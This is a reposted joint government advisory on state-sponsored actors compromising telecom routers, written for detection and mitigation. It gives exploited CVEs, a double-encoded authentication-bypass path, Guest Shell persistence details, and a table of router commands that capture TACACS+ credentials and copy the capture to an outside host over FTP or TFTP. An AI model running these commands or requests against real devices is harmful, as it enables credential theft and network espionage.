<p><a class="ck-anchor" id="GeoServer">[1]</a> “GeoServer/GeoServer,” GitHub, published July 1, 2024, <a href="https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w" target="_blank" title="GitHub GeoServer">https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w</a>.</p>
<p><a class="ck-anchor" id="dirtycow">[2]</a> “firefart/dirtycow,” GitHub, last modified 2021,<em>&nbsp;</em><a href="https://github.com/firefart/dirtycow" target="_blank" title="GitHub dirtycow">https://github.com/firefart/dirtycow</a>.</p>
<p><a class="ck-anchor" id="RingQ">[3]</a> “T4y1oR/RingQ” GitHub, last modified February 19, 2025. <a href="https://github.com/T4y1oR/RingQ" target="_blank" title="GitHub RingQ">https://github.com/T4y1oR/RingQ</a>.</p>
<p><a class="ck-anchor" id="fscan">[4]</a> “shadow1ng/fscan,” GitHub, last modified July 2025, <a href="https://github.com/shadow1ng/fscan" target="_blank" title="GitHub fscan">https://github.com/shadow1ng/fscan</a>.</p>
<p><a class="ck-anchor" id="Stowaway">[5]</a> “ph4ntonn/Stowaway,” GitHub, last modified April 2025,<em>&nbsp;</em><a href="https://github.com/ph4ntonn/Stowaway" target="_blank" title="GitHub Stowaway">https://github.com/ph4ntonn/Stowaway</a>.</p>
<hr /></div>
</div>
</div>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/cisa-shares-lessons-learned-from-an-incident-response-engagement/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System</title>
		<link>http://disensogroup.com/countering-chinese-state-sponsored-actors-compromise-of-networks-worldwide-to-feed-global-espionage-system/</link>
		<comments>http://disensogroup.com/countering-chinese-state-sponsored-actors-compromise-of-networks-worldwide-to-feed-global-espionage-system/#comments</comments>
		<pubDate>Mon, 25 Aug 2025 13:36:40 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/countering-chinese-state-sponsored-actors-compromise-of-networks-worldwide-to-feed-global-espionage-system/</guid>
		<description><![CDATA[Executive summary People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised...]]></description>
				<content:encoded><![CDATA[<h2><strong>Executive summary</strong></h2>
<p>People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised devices and trusted connections to pivot into other networks. These actors often modify routers to maintain persistent, long-term access to networks.&nbsp;</p>
<p>This activity partially overlaps with cyber threat actor reporting by the cybersecurity industry—commonly referred to as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor, among others. The authoring agencies are not adopting a particular commercial naming convention and hereafter refer to those responsible for the cyber threat activity more generically as “Advanced Persistent Threat (APT) actors” throughout this advisory. This cluster of cyber threat activity has been observed in the United States, Australia, Canada, New Zealand, the United Kingdom, and other areas globally.</p>
<p>This Cybersecurity Advisory (CSA) includes observations from various government and industry investigations where the APT actors targeted internal enterprise environments, as well as systems and networks that deliver services directly to customers. This CSA details the tactics, techniques, and procedures (TTPs) leveraged by these APT actors to facilitate detection and threat hunting, and provides mitigation guidance to reduce the risk from these APT actors and their TTPs.</p>
<p>This CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>Canadian Security Intelligence Service (CSIS)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB) &#8211; Národní úřad pro kybernetickou a informační bezpečnost</li>
<li>Finnish Security and Intelligence Service (SUPO) &#8211; Suojelupoliisi</li>
<li>Germany Federal Intelligence Service (BND) &#8211; Bundesnachrichtendienst</li>
<li>Germany Federal Office for the Protection of the Constitution (BfV) &#8211; &nbsp; Bundesamt für Verfassungsschutz</li>
<li>Germany Federal Office for Information Security (BSI) &#8211; Bundesamt für Sicherheit in der Informationstechnik</li>
<li>Italian External Intelligence and Security Agency (AISE) &#8211; Agenzia Informazioni e Sicurezza Esterna</li>
<li>Italian Internal Intelligence and Security Agency (AISI) &#8211; Agenzia Informazioni e Sicurezza Interna</li>
<li>Japan National Cyber Office (NCO) &#8211; 国家サイバー統括室</li>
<li>Japan National Police Agency (NPA) &#8211; 警察庁</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD) &#8211; Militaire Inlichtingen- en Veiligheidsdienst</li>
<li>Netherlands General Intelligence and Security Service (AIVD) &#8211; Algemene Inlichtingen- en Veiligheidsdienst</li>
<li>Polish Military Counterintelligence Service (SKW) &#8211; Służba Kontrwywiadu Wojskowego</li>
<li>Polish Foreign Intelligence Agency (AW) &#8211; Agencja Wywiadu</li>
<li>Spain National Intelligence Centre (CNI) &#8211; Centro Nacional de Inteligencia</li>
</ul>
<p>The authoring agencies strongly urge network defenders to hunt for malicious activity and to apply the mitigations in this CSA to reduce the threat of Chinese state-sponsored and other malicious cyber activity.</p>
<p>Any mitigation or eviction measures listed within are subject to change as new information becomes available and ongoing coordinated operations dictate. Network defenders should ensure any actions taken in response to the CSA are compliant with local laws and regulations within the jurisdictions within which they operate.&nbsp;</p>
<h2><strong>Background</strong></h2>
<p>The APT actors have been performing malicious operations globally since at least 2021. These operations have been linked to multiple China-based entities, including at least Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司), Beijing Huanyu Tianqiong Information Technology Co., Ltd. (北京寰宇天穹信息技术有限公司), and Sichuan Zhixin Ruijie Network Technology Co., Ltd. (四川智信锐捷网络科技有限公司). These companies provide cyber-related products and services to China’s intelligence services, including multiple units in the People’s Liberation Army and Ministry of State Security. The data stolen through this activity against foreign telecommunications and Internet service providers (ISPs), as well as intrusions in the lodging and transportation sectors, ultimately can provide Chinese intelligence services with the capability to identify and track their targets’ communications and movements around the world.</p>
<p>For more information on PRC state-sponsored malicious cyber activity, see <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors/china" title="CISA’s People's Republic of China Cyber Threat Overview and Advisories">CISA’s People&#8217;s Republic of China Cyber Threat Overview and Advisories</a> webpage.</p>
<p><strong>Download the PDF version of this report:</strong></p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-08/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.pdf" class="c-file__link" target="_blank">CSA COUNTERING CHINA STATE ACTORS COMPROMISE OF NETWORKS</a><br />
    <span class="c-file__size">(PDF,       1.20 MB<br />
  )</span>
  </div>
</div>
<p><strong>For a downloadable list of IOCs, visit:</strong></p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-08/AA25-239A-Countering-Chinese-State-Sponsored-Actors-Compromise-of-Networks-Worldwide-to-Feed-Global-Espionage-System.stix_.json" class="c-file__link" target="_blank">AA25-239A Countering Chinese State Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System</a><br />
    <span class="c-file__size">(JSON,       81.14 KB<br />
  )</span>
  </div>
</div>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-08/AA25-239A-Countering-Chinese-State-Sponsored-Actors-Compromise-of-Networks-Worldwide-to-Feed-Global-Espionage-System.stix_.xml" class="c-file__link" target="_blank">AA25-239A Countering Chinese State Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System</a><br />
    <span class="c-file__size">(XML,       66.50 KB<br />
  )</span>
  </div>
</div>
<h2><strong>Cybersecurity Industry Tracking&nbsp;</strong></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to this Chinese state-sponsored cyber activity. While not all encompassing, the following are the most notable threat group names related to this activity and commonly used within the cybersecurity community:</p>
<ul>
<li>Salt Typhoon,</li>
<li>OPERATOR PANDA,</li>
<li>RedMike,</li>
<li>UNC5807, and</li>
<li>GhostEmperor.&nbsp;</li>
</ul>
<p><strong>Note</strong>: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring agencies’ understanding for all activity related to these groupings.</p>
<h2><strong>Technical details</strong></h2>
<p>Note: This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK® for Enterprise framework, version 17">MITRE ATT&amp;CK® for Enterprise framework, version 17</a> and <a href="https://attack.mitre.org/versions/v17/matrices/ics/" target="_blank" title="MITRE ATT&amp;CK for ICS framework, version 17">MITRE ATT&amp;CK for ICS framework, version 17</a>. See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#AppA" title="Appendix A">Appendix A: MITRE ATT&amp;CK Tactics and Techniques</a> section of this advisory for a table of the APT actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Initial access</h3>
<p>Investigations associated with these APT actors indicate that they are having considerable success exploiting publicly known common vulnerabilities and exposures (CVEs) and other avoidable weaknesses within compromised infrastructure [<a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a>]. Exploitation of zero-day vulnerabilities has not been observed to date. The APT actors will likely continue to adapt their tactics as new vulnerabilities are discovered and as targets implement mitigations, and will likely expand their use of existing vulnerabilities. The following list is not exhaustive and the authoring agencies suspect that the APT actors may target other devices (e.g., Fortinet firewalls, Juniper firewalls, Microsoft Exchange, Nokia routers and switches, Sierra Wireless devices, Sonicwall firewalls, etc.).&nbsp;</p>
<p>Defenders should prioritize the following CVEs due to their historical exploitation on exposed network edge devices by these APT actors. Exploited CVEs include:</p>
<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-21887" target="_blank" title="CVE-2024-21887">CVE-2024-21887</a> &#8211; Ivanti Connect Secure and Ivanti Policy Secure web-component command injection vulnerability, commonly chained after CVE-2023-46805 (authentication bypass)</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-3400" target="_blank" title="CVE-2024-3400">CVE-2024-3400</a> &#8211; Palo Alto Networks PAN-OS GlobalProtect arbitrary file creation leading to OS command injection. The CVE allows for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations.</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-20273" target="_blank" title="CVE-2023-20273">CVE-2023-20273</a> &#8211; Cisco Internetworking Operating System (IOS) XE software web management user interface post-authentication command injection/privilege escalation (commonly chained with CVE-2023-20198 for initial access to achieve code execution as root) [<a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a>]</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" target="_blank" title="CVE-2023-20198">CVE-2023-20198</a> &#8211; Cisco IOS XE web user interface authentication bypass vulnerability
<ul>
<li>While exploiting CVE-2023-20198, the APT actors used the Web Services Management Agent (WSMA) endpoints <code>/webui_wsma_Http</code> or <code>/webui_wsma_Https</code> to bypass authentication and create unauthorized administrative accounts. In some cases, the APT actors obfuscated requests by “double encoding” portions of the path, e.g., <code>/%2577eb%2575i_%2577sma_Http</code> or <code>/%2577eb%2575i_%2577sma_Https</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1027/010/" target="_blank" title="T1027.010">T1027.010</a>]. Observed requests varied in case, so hunting and detection should be case-insensitive and tolerant of over-encoding.</li>
<li>After patching this CVE, WSMA endpoints requests are internally proxied, and the system adds a <code>Proxy-Uri-Source HTTP</code> header as part of the remediation logic. The presence of <code>Proxy-Uri-Source</code> header in traffic to <code>/webui_wsma_*</code> indicates a patched device handling the request, not exploitation. This can help distinguish between vulnerable and remediated systems when analyzing logs or captures.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2018-0171" target="_blank" title="CVE-2018-0171 ">CVE-2018-0171</a> &#8211; Cisco IOS and IOS XE smart install remote code execution vulnerability</li>
</ul>
<p>The APT actors leverage infrastructure, such as virtual private servers (VPSs) [<a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a>] and compromised intermediate routers [<a href="https://attack.mitre.org/versions/v17/techniques/T1584/008/" target="_blank" title="T1584.008">T1584.008</a>], that have not been attributable to a publicly known botnet or obfuscation network infrastructure to target telecommunications and network service providers, including ISPs [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a>].&nbsp;</p>
<p>The APT actors may target edge devices regardless of who owns a particular device. Devices owned by entities who do not align with the actors’ core targets of interest still present opportunities for use in attack pathways into targets of interest. The actors leverage compromised devices and trusted connections or private interconnections (e.g., provider-to-provider or provider-to-customer links) to pivot into other networks [<a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a>]. In some instances, the actors modify routing and enable traffic mirroring (switch port analyzer (SPAN)/remote SPAN (RSPAN)/encapsulated remote SPAN (ERSPAN) where available) on compromised network devices and configure Generic Routing Encapsulation (GRE)/IPsec tunnels and static routes to achieve the same goal [<a href="https://attack.mitre.org/versions/v17/techniques/T1095/" target="_blank" title="T1095">T1095</a>]. Additionally, these APT actors often simultaneously exploit large numbers of vulnerable, Internet-exposed devices across many IP addresses and may revisit individual systems for follow-on operations.</p>
<p>Initial access vectors remain a critical information gap for parties working to understand the scope, scale, and impact of the actors’ malicious activity. The authoring agencies encourage organizations to provide compromise details to appropriate authorities (see <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Contactinfo" title="Contact Information">Contact information</a>) to continue improving all parties’ understanding and responses.</p>
<h3>Persistence</h3>
<p>To maintain persistent access to target networks, the APT actors use a variety of techniques. Notably, a number of these techniques can obfuscate the actors’ source IP address in system logs, as their actions may be recorded as originating from local IP addresses [<a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a>]. Specific APT actions include:</p>
<ul>
<li>Modifying Access Control Lists (ACLs) to add IP addresses. This alteration allows the actors to bypass security policies and maintain ongoing access by explicitly permitting traffic from a threat actor-controlled IP address [<a href="https://attack.mitre.org/versions/v17/techniques/T1562/004/" target="_blank" title="T1562.004">T1562.004</a>].
<ul>
<li>The APT actors often named their ACLs “access-list 20”. When 20 was already used, the actors commonly used 50 or 10.</li>
</ul>
</li>
<li>Opening standard and non-standard ports, which can open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS) [<a href="https://attack.mitre.org/versions/v17/techniques/T1071/" target="_blank" title="T1071">T1071</a>]. This strategy supplies multiple avenues for remote access and data exfiltration. Additionally, utilizing non-standard ports can help the APT actors evade detection by security monitoring tools that focus on standard port activity [<a href="https://attack.mitre.org/versions/v17/techniques/T1571/" target="_blank" title="T1571">T1571</a>].
<ul>
<li>The APT actors have been enabling SSH servers and opening external-facing ports on network devices to maintain encrypted remote access [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/004/" target="_blank" title="T1021.004">T1021.004</a>]. In some cases, the SSH services were established on high, non-default Transmission Control Protocol (TCP) ports using the port numbering scheme of <code>22x22</code> or <code>xxx22</code>, though port patterns may vary across intrusions. The actors may add keys to existing SSH services to regain entry into network devices [<a href="https://attack.mitre.org/versions/v17/techniques/T1098/004/" target="_blank" title="T1098.004">T1098.004</a>].</li>
<li>The APT actors enable or abuse built-in HTTP/HTTPS management servers and sometimes reconfigure them to non-default high ports. <strong>Note: </strong>HTTP servers have been observed using the port numbering scheme of <code>18xxx</code>.
<ul>
<li>Enabling HTTP/HTTPS servers on Cisco devices affected by CVE-2023-20198. If the web UI feature is enabled on Cisco IOS XE Software, this vulnerability provides an entry opportunity for the APT actors.</li>
</ul>
</li>
</ul>
</li>
<li>Following compromise of a router, the following&nbsp;commands and activities have been observed on compromised devices [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/008/" target="_blank" title="T1059.008">T1059.008</a>]:
<ul>
<li>Executing commands via SNMP [<a href="https://attack.mitre.org/versions/v17/techniques/T1569/" target="_blank" title="T1569">T1569</a>].</li>
<li>SSH activity from remote or local IP addresses.</li>
<li>Web interface panel (POST) requests.</li>
<li>When present, using service or automation credentials (e.g., those used by configuration-archival systems such as RANCID) to enumerate and access other networking devices.</li>
<li>Executing Tcl scripts (e.g., <code>TCLproxy.tcl</code> and <code>map.tcl</code>) on Cisco IOS devices where <code>tclsh</code> was available.</li>
</ul>
</li>
<li>Depending on the configuration of the Simple Network Management Protocol (SNMP) on the compromised network device, the APT actors enumerate and alter the configurations for other devices in the same community group, when possible [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/" target="_blank" title="T1021">T1021</a>]. <strong>Note</strong>: Properly configured SNMPv3 is considerably more secure than previous versions.
<ul>
<li>Utilizing SNMPwalk (SNMP GET/WALK) to enumerate devices from APT actor-controlled hosts. Where configuration changes were observed, they were issued as SNMP SET requests to writable objects from those hosts [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a>].</li>
</ul>
</li>
<li>Creating tunnels over protocols, such as Generic Routing Encapsulation (GRE), multipoint GRE (mGRE), or IPsec, on network devices, presumably based on what would be expected in the environment [<a href="https://attack.mitre.org/versions/v17/techniques/T1572/" target="_blank" title="T1572">T1572</a>].
<ul>
<li>These tunnels allow for the encapsulation of multiple network layer protocols over a single tunnel, which can create persistent and covert channels for data transmission to blend in with normal network traffic.</li>
<li>Some of these actions may obscure the APT actors’ source IP address in logs due to being logged as a local IP.</li>
</ul>
</li>
<li>Running commands in an on-box Linux container on supported Cisco networking devices to stage tools, process data locally, and move laterally within the environment. This often allows the APT actors to conduct malicious activities undetected because activities and data within the container are not monitored closely. [<a href="https://attack.mitre.org/versions/v17/techniques/T1610/" target="_blank" title="T1610">T1610</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1588/002/" target="_blank" title="T1588.002">T1588.002</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1588/005/" target="_blank" title="T1588.005">T1588.005</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a>].
<ul>
<li>Within Guest Shell, running Python (such as siet.py to exploit Cisco Smart Install) and native Linux tooling, installing packages (e.g., via <code>pip</code>/<code>yum</code> where available), parsing and staging locally collected artifacts (e.g., configurations, packet captures) on device storage [<a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a>]. On NX-OS devices specifically, using <code>dohost</code> to script host-level CLI actions for reconnaissance and persistence. For Cisco IOS XE, Guest Shell is a Linux container (LXC) managed by IOx that is enabled with <code>guestshell enable</code> and accessed with <code>guestshell run bash</code>. By default, processes inside Guest Shell egress via the management virtual routing and forwarding (VRF) instance. On platforms without a dedicated management port, connectivity can be provided with a <code>VirtualPortGroup</code> interface. Guest Shell can execute Python and other 64-bit Linux applications and can read/write device-accessible storage (e.g., flash) as configured. [<a href="https://attack.mitre.org/versions/v17/techniques/T1609/" target="_blank" title="T1609">T1609</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1543/005/" target="_blank" title="T1543.005">T1543.005</a>]</li>
<li>For Cisco NX-OS, Guest Shell is an LXC environment entered with <code>run guestshell</code>. It has direct access to <code>bootflash:</code> and can invoke host NX-OS CLI via the <code>dohost</code> utility. Networking uses the device’s default VRF by default. Operators (or malware) can run commands in other VRFs using <code>chvrf</code>. Systemd-managed services are typically long-running components inside Guest Shell.</li>
<li>Using <code>guestshell disable</code> and <code>guestshell destroy</code> commands to deactivate and uninstall Guest Shell container and return all resources to the system [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/009/" target="_blank" title="T1070.009">T1070.009</a>].</li>
</ul>
</li>
<li>Leveraging open source multi-hop pivoting tools, such as&nbsp;STOWAWAY, to build chained relays for command and control (C2) and operator access, including interactive remote shells, file upload and download, SOCKS5/HTTP proxying, and local/remote port mapping with support for forward and reverse connections over encrypted node-to-node links [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a>].</li>
</ul>
<h3>Lateral movement &amp; collection</h3>
<p>Following initial access, the APT actors target protocols and infrastructure involved in authentication—such as Terminal Access Controller Access Control System Plus (TACACS+)—to facilitate lateral movement across network devices, often through SNMP enumeration and SSH. From these devices, the APT actors passively collect packet capture (PCAP) from specific ISP customer networks [<a href="https://attack.mitre.org/versions/v17/techniques/T1040/" target="_blank" title="T1040">T1040</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1005/" target="_blank" title="T1005">T1005</a>]. To further support discovery and lateral movement, the APT actors may target:&nbsp;</p>
<ul>
<li>Authentication Protocols including TACACS+ and Remote Authentication Dial-In User Service (RADIUS)</li>
<li>Managed Information Base (MIB) [<a href="https://attack.mitre.org/versions/v17/techniques/T1602/001/" target="_blank" title="T1602.001">T1602.001</a>]</li>
<li>Router interfaces</li>
<li>Resource Reservation Protocol (RSVP) sessions</li>
<li>Border Gateway Protocol (BGP) routes</li>
<li>Installed software</li>
<li>Configuration files [<a href="https://attack.mitre.org/versions/v17/techniques/T1590/004/" target="_blank" title="T1590.004">T1590.004</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1602/002/" target="_blank" title="T1602.002">T1602.002</a>]
<ul>
<li>This is achieved either from existing sources in the network (e.g., output of provider scripts) or through active survey of devices and Trivial File Transfer Protocol (TFTP), to include Multiprotocol Label Switching (MPLS) configuration information.</li>
</ul>
</li>
<li>In-transit network traffic using native capabilities to capture or mirror traffic via the SPAN, RSPAN, or ERSPAN capabilities available on many router models.</li>
<li>Provider-held data, such as:
<ul>
<li>Subscriber information</li>
<li>User content</li>
<li>Customer records and metadata</li>
<li>Network diagrams, inventories, device configurations, and vendor lists</li>
<li>Passwords</li>
</ul>
</li>
</ul>
<p>Capturing network traffic containing credentials via compromised routers is a common method for further enabling lateral movement [<a href="https://attack.mitre.org/versions/v17/techniques/T1040/" target="_blank" title="T1040">T1040</a>]. This typically takes the form of:</p>
<ul>
<li>Leveraging native PCAP functionalities (e.g., Cisco’s Embedded Packet Capture) on routers to collect RADIUS or TACACS+ authentication traffic, which may contain credentials transmitted in cleartext or weakly protected forms.
<ul>
<li>PCAPs have been observed containing naming schemes such as <code>mycap.pcap</code>,&nbsp;<code>tac.pcap</code>,&nbsp;<code>1.pcap</code>, or similar variations.</li>
</ul>
</li>
<li>Modifying a router’s TACACS+ server configuration to point to an APT actor-controlled IP address [<a href="https://attack.mitre.org/versions/v17/techniques/T1556/" target="_blank" title="T1556">T1556</a>]. These actors may use this capability to capture authentication attempts from network administrators or other devices. They may also adjust Authentication, Authorization, and Accounting (AAA) configurations, forcing devices to use less secure authentication methods or send accounting information to their infrastructure.</li>
</ul>
<p>The APT actors collect traffic at Layer 2 or 3 (depending on the protocol used), largely from Cisco IOS devices; however, targeting of other device types is also likely. Based on analysis, the APT actors hold interest in making configuration and routing changes to the devices after compromising the routers. While some actions are specific to Cisco devices, the actors are capable of targeting devices from other vendors and could utilize similar functionality. The APT actors perform several of the modifications or techniques below to facilitate follow-on actions.</p>
<ul>
<li>Creating accounts/users and assigning privileges to those accounts, often via modifying router configurations [<a href="https://attack.mitre.org/versions/v17/techniques/T1136/001/" target="_blank" title="T1136.001">T1136.001</a>].
<ul>
<li>Brute forcing and re-using credentials to access Cisco devices. If a router configuration is collected during initial exploitation and contains a weak hashed Cisco Type 5 (MD5) or 7 (legacy, weak reversible encoding) password [<a href="https://attack.mitre.org/versions/v17/techniques/T1003/" target="_blank" title="T1003">T1003</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a>]. Weak credentials, such as “cisco” as the username and password, are routinely exploited through these techniques.</li>
</ul>
</li>
<li>Scanning for open ports and services and mirroring (SPAN/RSPAN sessions), allowing traffic monitoring from multiple interfaces [<a href="https://attack.mitre.org/versions/v17/techniques/T1595/" target="_blank" title="T1595">T1595</a>].</li>
<li>Running commands on the router via SNMP, SSH, and HTTP GET or POST requests. These requests typically target privileged execution paths, such as <code>/level/15/exec/-/*</code>, and may include instructions to display configuration files, access BGP routes, manage VRF instances, or clear system logs [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a>].
<ul>
<li>Many compromised devices use well known SNMP community strings, including “public” and “private”.</li>
</ul>
</li>
<li>Configuring PCAP capabilities to collect network traffic.</li>
<li>Configuring tunnels.</li>
<li>Using monitoring tools present in the environment to monitor a device’s (commonly a router’s) configuration changes.</li>
<li>Updating routing tables to route traffic to actor-controlled infrastructure.</li>
<li>Using several techniques to avoid detection of their activity, including:
<ul>
<li>Deleting and/or clearing logs, possibly in tandem with reverting or otherwise modifying stored configuration files to avoid leaving traces of the modifications [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/" target="_blank" title="T1070">T1070</a>].</li>
<li>Disabling logging and/or disabling sending logs to central servers.</li>
<li>Stopping/starting event logging on network devices.</li>
<li>Configuring a Cisco device to run a Guest Shell container to evade detection from collecting artifacts, data, or PCAP [<a href="https://attack.mitre.org/versions/v17/techniques/T1610/" target="_blank" title="T1610">T1610</a>].</li>
</ul>
</li>
</ul>
<h3>Exfiltration</h3>
<p>A key concern with exfiltration is the APT actors’ abuse of peering connections (i.e., a direct interconnection between networks that allows traffic exchange without going through an intermediary) [<a href="https://attack.mitre.org/versions/v17/techniques/T1599/" target="_blank" title="T1599">T1599</a>]. Exfiltration may be facilitated due to a lack of policy restraints or system configurations limiting the types of data received by peered ISPs.</p>
<p>Analysis indicates that the APT actors leverage separate (potentially multiple) command and control channels for exfiltration to conceal their data theft within the noise of high-traffic nodes, such as proxies and Network Address Translation (NAT) pools. The APT actors often use tunnels, such IPsec and GRE, to conduct C2 and exfiltration activities [<a href="https://attack.mitre.org/versions/v17/techniques/T1048/003/" target="_blank" title="T1048.003">T1048.003</a>].</p>
<h2><strong>Case study</strong></h2>
<p>This section details techniques employed by the APT actors, as well as indicators received from analysis to detect this activity. The APT actors were stopped before further actions could be taken on the compromised network.</p>
<h3>Collecting native PCAP</h3>
<p>The APT actors collected PCAPs using native tooling on the compromised system, with the primary objective likely being to capture TACACS+ traffic over TCP port 49. TACACS+ packet bodies can be decrypted if the encryption key is known. In at least one case, the device configuration stored the TACACS+ shared secret using Cisco Type 7 reversible obfuscated encoding. Recovering that secret from the configuration would enable offline decryption of captured TACACS+ payloads. TACACS+ traffic is used for authentication, often for administration of network equipment and including highly privileged network administrators accounts and credentials, likely enabling the actors to compromise additional accounts and perform lateral movement.&nbsp;<br />The commands listed in<strong> Table 1</strong> were observed on a Cisco IOS XE-based host to aid PCAP exfiltration.</p>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 1</strong>: Commands to collect PCAP</caption>
<thead>
<tr>
<th role="columnheader">Command&nbsp;&nbsp;&nbsp;&nbsp;</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>monitor capture mycap interface &lt;interface-name&gt; both</td>
<td>Set up a packet capture named &#8216;mycap&#8217;</td>
</tr>
<tr>
<td>monitor capture mycap match ipv4 protocol tcp any any eq 49&nbsp;</td>
<td rowspan="2">Target port 49 on the above interface &#8211; TACACS+</td>
</tr>
<tr>
<td>monitor capture mycap buffer size 100</td>
</tr>
<tr>
<td>monitor capture mycap start</td>
<td>Start the capture</td>
</tr>
<tr>
<td>show monitor capture mycap buffer brief</td>
<td>Check status of capture</td>
</tr>
<tr>
<td>monitor capture mycap export bootflash:tac.pcap</td>
<td>Export PCAP to file, staging for exfiltration</td>
</tr>
<tr>
<td>copy bootflash:tac.pcap ftp://&lt;domain/service&gt;:*@&lt;IP&gt;</td>
<td rowspan="2">Exfiltration</td>
</tr>
<tr>
<td>copy bootflash:tac.pcap tftp://&lt;IP&gt;/tac.pcap</td>
</tr>
</tbody>
</table>
<h4><strong>Host-level indicators</strong></h4>
<p>If console logging or visibility of remote FTP/TFTP from a network appliance are available, the following host-level indicators may assist with detecting activity:&nbsp;</p>
<p><code>Capture name: 'mycap'&nbsp;</code><br /><code>Capture rule: 'match ipv4 protocol tcp any any eq 49'&nbsp;</code><br /><code>Exported pcap filename: 'tac.pcap'</code></p>
<p><code>tftp remote filename: 'tac.pcap'&nbsp;</code><br /><code>tftp remote IP: [remote IP]</code>&nbsp;</p>
<h3>Enabling SSH access to the underlying Linux host on IOS XR</h3>
<p>Cisco IOS XR (64-bit) is a Linux-based network operating system built on a Yocto-based Wind River Linux distribution. IOS XR is typically administered via the IOS XR CLI over SSH on port TCP/22 or via console.&nbsp;</p>
<p>The built-in <code>sshd_operns</code> service exposes an additional SSH endpoint on the host Linux. When enabled, it listens on TCP/57722 and provides direct shell access to the host OS. Root logins are not permitted to this service, as only non-root accounts can authenticate.</p>
